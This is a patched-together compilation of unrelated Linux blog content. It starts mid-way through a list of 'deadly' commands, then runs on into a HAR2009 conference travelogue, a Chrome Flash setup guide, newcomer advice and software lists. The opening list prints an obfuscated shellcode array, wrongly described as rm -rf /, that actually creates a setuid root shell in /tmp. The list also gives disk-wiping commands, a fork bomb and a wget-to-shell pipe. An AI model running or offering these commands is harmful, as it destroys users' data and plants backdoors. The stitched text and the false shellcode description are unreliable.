char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

This is said to be a machine-code version of [rm -rf /], and in this form it can deceive even rather experienced Linux users.

3. Code:

mkfs.ext3 /dev/sda

This will reformat the device named after the mkfs command, wiping out all the files on it.

4. Code:

:(){ :|:& };:

Known as a fork bomb, this command tells your system to spawn processes endlessly until it freezes, which can often lead to corruption of data.
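The one-liner is easier to understand rewritten with whitespace and a descriptive function name. The sketch below only prints that readable form as a string; never execute the definition itself:

```shell
#!/bin/sh
# The same fork bomb with whitespace and a readable function name ("bomb" is
# an arbitrary name; ':' in the original is just a terser one). Printed as a
# string only - running the definition would exhaust your process table.
readable='bomb() { bomb | bomb & }; bomb'
echo "$readable"
```

A function defines itself to pipe its own output into another copy of itself and background the pair, so each call doubles the process count.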

5. Code:

any_command > /dev/sda

With this command, raw data is written directly to a block device, usually clobbering the filesystem and resulting in total loss of data.

6. Code:

wget http://some_untrusted_source -O- | sh

Never download from untrusted sources and pipe the result straight into a shell; you would be executing whatever possibly malicious code they are giving you.

7. Code:

mv /home/yourhomedirectory/* /dev/null

This command will try to move all the files inside your home directory to /dev/null, a device file rather than a real directory; any data that ends up there is gone, and you will never see those files again.

There are of course other equally deadly Linux commands that I have not included here, so if you have something to add, please share it with us in a comment.

Camping and Hacking at HAR2009


HAR2009 logo

On Monday 10 August evening I arrived under a light drizzle in Vierhouten in the Netherlands, after cycling the last 100km section of the 300km that I had traveled from the University of Koblenz. I just had time for a beer and a soup, as the c-base bus arrived from Berlin. Night was falling fast, and so we all got together and helped put up the large colorful tent on the edge of a still mostly empty field. The BSD camp next to us had worked out how to get some electricity and kindly let us have enough to power a lamp and a couple of laptops. So we could relax and listen to some music, as it got colder.

I travel very light on my bicycle for obvious reasons, so I don't carry a tent with me. Instead I go from hotel, to youth hostel, to family couch. I have not tried the Couch surfing network yet, but it's an extra option I could use. Here at the camp, in the middle of the forest, none of those options was available. So I was very grateful to Dirk Höschen for having brought a nice tent for me to sleep in, and also to Rasta for giving me some blankets and furs he happened to have to sleep on. The thick down coat I had carried with me from France finally came in useful in the cold nights that followed.

C-base tent at HAR2009
(the tent to the right was the one I slept in)

HAR (Hacking At Random) is an international technology and security conference with a strong free software, freedom-of-information political leaning. I had not heard of it until I reached Berlin, but was told so much good about it by so many different people that I was convinced to go. I was lucky to get some last-minute tickets from some friends of a friend from the Viennese Metalab who could not make it. The 2000 tickets had all sold out a month before. Needless to say, I had largely missed the deadlines for submitting a presentation. The organisers, though, were interested enough in what I was presenting on Distributed Social Networks that they gave me a couple of 2-hour workshop sessions. The first of them was filmed, but I am not sure where the video is yet. (I'll update this when I get a link to it.) On Saturday I was lucky to get a 10-minute slot on the Lightning Talks track. This was recorded:

(( Mhh, one learns a lot from being filmed. I was not so aware how much I gesticulate with my hands. Something I picked up in France I think, but without the French mastery...))

Given how foaf+ssl builds on X509 and relies on existing Internet infrastructure, this conference was an excellent place to learn the latest on holes and limitations in these technologies. Perhaps the most relevant talk was the one given by Dan Kaminsky, x509 considered harmful, which he gave while downing a bottle of excellent whiskey - as I found out while talking to him after the presentation.

In his talk Dan really drives home the importance of DNSSEC, the next version of DNS, which is about to get a much higher profile as the root DNS servers move over to it at the end of this year. The x509 problems could mostly disappear with the rollout of DNSSEC, which is good for me, because it means we can continue working on foaf+ssl.

If there was a main theme I got from this conference, then it was clearly the importance of the deployment of DNSSEC. It may be a lot more heavy weight, and a lot more complex than what we have currently, but the problems are getting to be so big, that it is unavoidable. For a good presentation of these issues see Bert Hubert's talk, the man behind PowerDNS:

For an overview/introduction of what DNSSEC is, how it functions and what problems it solves, see Rick Van Rein's presentation Cracking Internet: the urgency of DNSSEC.

Sun Microsystems is also supporting the DNSSEC effort. In this security alert, you can read

Note 1: The above patches implement mitigation strategies within the implementation of the DNS protocol, specifically source port randomization and query ID randomization making BIND 9 more resilient to an attack. It does not, however, completely remove the possibility of exploitation of this issue.

The full resolution is for DNS Security Extensions (DNSSEC) to be implemented Internet-wide. DNS zone administrators should start signing their zones.

If your site's parent DNS zone is not signed you can register with the ISC's DNSSEC Look-aside Validation (DLV) registry at the following URL:

https://secure.isc.org/ops/dlv/

Further details on configuring your DNS zones for DNSSEC are available from the ISC at the following URL:

http://www.isc.org/sw/bind/docs/DNSSEC_in_6_minutes.pdf

The issues addressed by these talks are not just technical; they have political implications for how we live. There were many good talks on the subject at HAR, but my favorite, perhaps because I followed the story in France so carefully, was the one given by Jéremie Zimmermann, co-founder of Quadrature du Net, a French site (with an English translation) that does an excellent job of tracking the position of French and European politicians on issues related to web freedom. Jeremie's talk on Hacking the Law was on Sunday noon, the last day of the conference, and there were some technical problems getting the projectors to work. The best way to get it for the moment is to download it from the command line:

curl -o jeremie.ogv ftp://ftp.sickos.org/pub/HAR2009/room1/r1-filer.20090816-115405.ogv
And view it in your favorite ogg viewer. I think the talk starts around the 20th minute.

The talks will hopefully be placed online soon in an easier to access manner.

But HAR2009 was not just about talks. It was also about meeting people, talking, exchanging ideas. Some of the best parties were organised by the Chaos Computer Club, a Germany-wide hackers' club that deals with security and political issues, and that is widely referenced by the German media when in need of enlightenment. They had a great tent with an excellent view of a pond, and at night excellent DJs to create just the right ambiance for meeting people. Mix that together with some Tschunk, a cocktail of Club-Mate - the Germanic hacker drink - and rum, and I found it difficult to go to sleep before 4am.

On Monday morning I cycled the remaining 100km to Amsterdam, one of the most easy going, beautiful towns in Europe, where I am writing this.

Thursday, August 20, 2009

How to Enable Flash Support in Google Chrome in Ubuntu

The Chromium team has released an unstable alpha version of Google Chrome for the Linux and Mac platforms. If you are keen to try out Google Chrome on your Ubuntu machine but not willing to run it under Wine, you can now grab the deb file and install it on your system.

One of the limitations of Google Chrome on Linux is that it does not support Flash. If you intend to use it to watch your favorite YouTube channel, you are out of luck. Luckily, there is a little trick you can use to overcome this limitation: if you have installed the Adobe Flash Player for your Firefox browser, you can use the same player to run Flash content in Google Chrome.

Installation

If you have not installed Google Chrome (unstable), go to the Chromium dev channel and grab the deb file for your system (32-bit or 64-bit). Double-click the deb file to start the installation. The whole process shouldn't take more than 5 minutes.

Check for Adobe Flash player

If you have previously installed the Adobe Flash Player in your system, you should be able to find the libflashplayer.so file in the /usr/lib/flashplugin-installer directory. However, if you have installed the Flash player via the ubuntu-restricted-extra package, the libflashplayer.so will be located at the /usr/lib/adobe-flashplugin directory instead.

To find out where your libflashplayer.so is located, you might want to do a search in Nautilus.
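If you prefer the terminal to Nautilus, a quick find over /usr/lib covers both of the directories mentioned above:

```shell
# Search the usual plugin directories for the Flash library; this prints the
# full path if the file is found, and nothing otherwise.
find /usr/lib -name 'libflashplayer.so' 2>/dev/null
```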


If you have not installed Flash Player, run the following command in your terminal to install it:

sudo apt-get install flashplugin-installer

Installing the Flash plugin

Create a plugins folder in the Google Chrome directory

sudo mkdir /opt/google/chrome/plugins

Copy the libflashplayer.so file to the plugins folder.

sudo cp /usr/lib/flashplugin-installer/libflashplayer.so /opt/google/chrome/plugins

Note: change the source path if your libflashplayer.so file is located elsewhere.
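The mkdir and cp steps can be folded into one small script that also handles the alternate package location mentioned earlier; a sketch, using the paths given in the text:

```shell
#!/bin/sh
# Copy libflashplayer.so into Chrome's plugins directory, checking both of
# the package locations discussed above.
copied=no
for dir in /usr/lib/flashplugin-installer /usr/lib/adobe-flashplugin; do
    if [ "$copied" = no ] && [ -f "$dir/libflashplayer.so" ]; then
        sudo mkdir -p /opt/google/chrome/plugins
        sudo cp "$dir/libflashplayer.so" /opt/google/chrome/plugins/
        echo "copied from $dir"
        copied=yes
    fi
done
[ "$copied" = yes ] || echo "libflashplayer.so not found in either location"
```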

Editing the Application menu

Right click on the Application menu bar and select “Edit Menus”.

Scroll down to find “Internet” in the left pane and select Google Chrome on the right. Click the Properties button.


In the Command field, change the command to

/opt/google/chrome/google-chrome --enable-plugins %U


Save and close all the windows.

The flash player should be working in your Google Chrome now.



Linux Newbie, You Have Options


Nothing gets people in the Linux World riled up like comparing distributions, desktops or editors. But for the new Linux user, the whole thing is a bit confusing. What do we tell them? Do we verbally slug it out in forums or do we offer gentle guidance to those entering the Linux jungle for the first time? It's hard not to offer an opinion in such emotional matters. One might believe that Linux, choice of desktop and editors are religious notions instead of technical ones. I offer the following gentle guidelines for the newbie who dares enter our sacred space.

Linux is many things to many people. For you, it is an alternative to Microsoft Windows and the Mac OS. For us, Linux is an operating system kernel that's used in creating Linux distributions. Distributions are a collection of programs, applications, tools and graphics to create an operating system environment comparable to what you experience with Windows or Mac.

The window environment, or GUI as some call it, comes in a variety of flavors or implementations. They are all similar to Windows and Mac but also distinctly different. Your major choices are GNOME, KDE, XFCE and LXDE. GNOME and KDE are great for desktop computers, but servers need less graphical weight than desktops, so for a server you would probably choose between XFCE and LXDE.

These days you have choices for almost every type of software that you've grown accustomed to on Windows or Mac. There are office suites (KOffice, OpenOffice), individual applications like Abiword and Siag, games, graphics manipulation programs (GIMP) and just about anything you can conjure up in your mind.

There's no single correct answer to every question concerning Linux or its associated applications. Since they all work pretty well, it comes down to a matter of choice.

Where to begin?

If you're totally new to the Linux realm, I suggest you try Ubuntu Linux. Grab the latest ISO image from ubuntu.com, burn it to an optical disk, boot your computer to it, install and never look back.
Forget all the rhetoric surrounding this distribution or that distribution--just use it, learn it and go from there.

Don't be turned off by the fanboys, fanatics and others who want to sway your mind into their respective camps--just ignore them, laugh at them and enjoy your awesome new computer.
As you learn more about Linux, you might find that Ubuntu doesn't work for you as well as another distribution--so be it. Choose another. Change monthly if you want.

Realize this: Your Linux distribution is a tool, an operating system--a righteous one but only that--an operating system. Feel free to explore this new world and enjoy it. You'll have allies and enemies no matter which camp you decide to stay in but that comes with the territory.

Welcome Linux newbie, we're glad to have you.





FONT: http://www.daniweb.com/blogs/entry4639.html#

NANO EDITOR COURSE BY http://beginlinux.com








This is a series of courses to help you with Bash shell scripting. It is divided into several sections:
Bash Shell: Basics
Bash Shell: vi Text Editor

Bash Shell: Nano Text Editor
Bash Shell: Scripting Basics
Bash Shell: Regular Expressions
Bash Shell: Text Filters

The third course will help you understand the basics of working with the nano text editor in Linux. At some point, everyone who uses Linux will need a text editor, so whatever text editor you choose, be sure you load it and use it before you need it.


COMPLETE LINUX SOFTWARE PACKAGE


Graphics:

  • The GIMP - free software replacement for Adobe Photoshop
  • F-Spot - full-featured personal photo management application for the GNOME desktop
  • Google Picasa - application for organizing and editing digital photos

Internet:

  • Firefox
  • Opera
  • Flash Player 10
  • FileZilla - multithreaded FTP client
  • Thunderbird - email and news client
  • Evolution - combines e-mail, calendar, address book, and task list management functions
  • aMule - P2P file sharing application
  • KTorrent - Bittorrent client
  • Azureus/Vuze - Java Bittorrent client
  • Kopete - multi-platform instant messaging client
  • Skype
  • Google Earth
  • Quassel IRC - IRC client

Office:

  • OpenOffice Writer - replacement for Microsoft Word
  • OpenOffice Calc - replacement for Microsoft Excel
  • Adobe Reader
  • GnuCash - double-entry book-keeping personal finance system, similar to Quicken
  • Scribus - open source desktop publishing (DTP) application

Sound & Video:

  • Amarok - audio player
  • Audacity - free, open source, cross platform digital audio editor
  • Banshee - audio player, can encode/decode various formats and synchronize music with Apple iPods
  • MPlayer - media player (video/audio), supports WMA
  • Rhythmbox Music Player - audio player, similar to Apple's iTunes, with support for iPods
  • gtkPod - software similar to Apple's iTunes, supports iPod, iPod nano, iPod shuffle, iPod photo, and iPod mini
  • XMMS - audio player similar to Winamp
  • dvd::rip - full featured DVD copy program
  • Kino - free digital video editor
  • Sound Juicer CD Extractor - CD ripping tool, supports various audio codecs
  • VLC Media Player - media player (video/audio)
  • Helix Player - media player, similar to the Real Player
  • Totem - media player (video/audio)
  • Xine - media player, supports various formats; can play DVDs
  • Brasero - CD/DVD burning program
  • K3B - CD/DVD burning program
  • Multimedia Codecs

Programming:

  • KompoZer - WYSIWYG HTML editor, similar to Macromedia Dreamweaver, but not as feature-rich (yet)
  • Bluefish - text editor, suitable for many programming and markup languages
  • Quanta Plus - web development environment, including a WYSIWYG editor

Other:

  • VirtualBox OSE - lets you run your old Windows desktop as a virtual machine under your Linux desktop, so you don't have to entirely abandon Windows
  • TrueType fonts
  • Java
  • Read-/Write support for NTFS partitions

TRUETYPE FONTS ON *NIX/LINUX BASED SYSTEMS





Add a TrueType Font

You can use the file manager to add a TrueType font. To add a TrueType font, perform the following steps:

1. Open a file manager window and select the TrueType font that you want to add.
2. From a file browser window, access the fonts:/// location. The fonts are displayed as icons.
3. Copy the TrueType font file that you want to add to the fonts:/// location.
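On GNOME systems the fonts:/// location maps to the per-user font directory, so the same steps can be done from a terminal. A hedged sketch, where MyFont.ttf is a placeholder created here only for the demonstration (point at a real font file in actual use):

```shell
#!/bin/sh
# Install a TrueType font for the current user from the terminal.
# MyFont.ttf is a placeholder; substitute your real font file.
font="MyFont.ttf"
touch "$font"                        # stand-in for a real downloaded font file
mkdir -p "$HOME/.fonts"              # per-user font directory read by fontconfig
cp "$font" "$HOME/.fonts/"
# Rebuild the font cache if fontconfig's fc-cache tool is available:
command -v fc-cache >/dev/null 2>&1 && fc-cache -f "$HOME/.fonts" || true
echo "installed: $HOME/.fonts/$font"
```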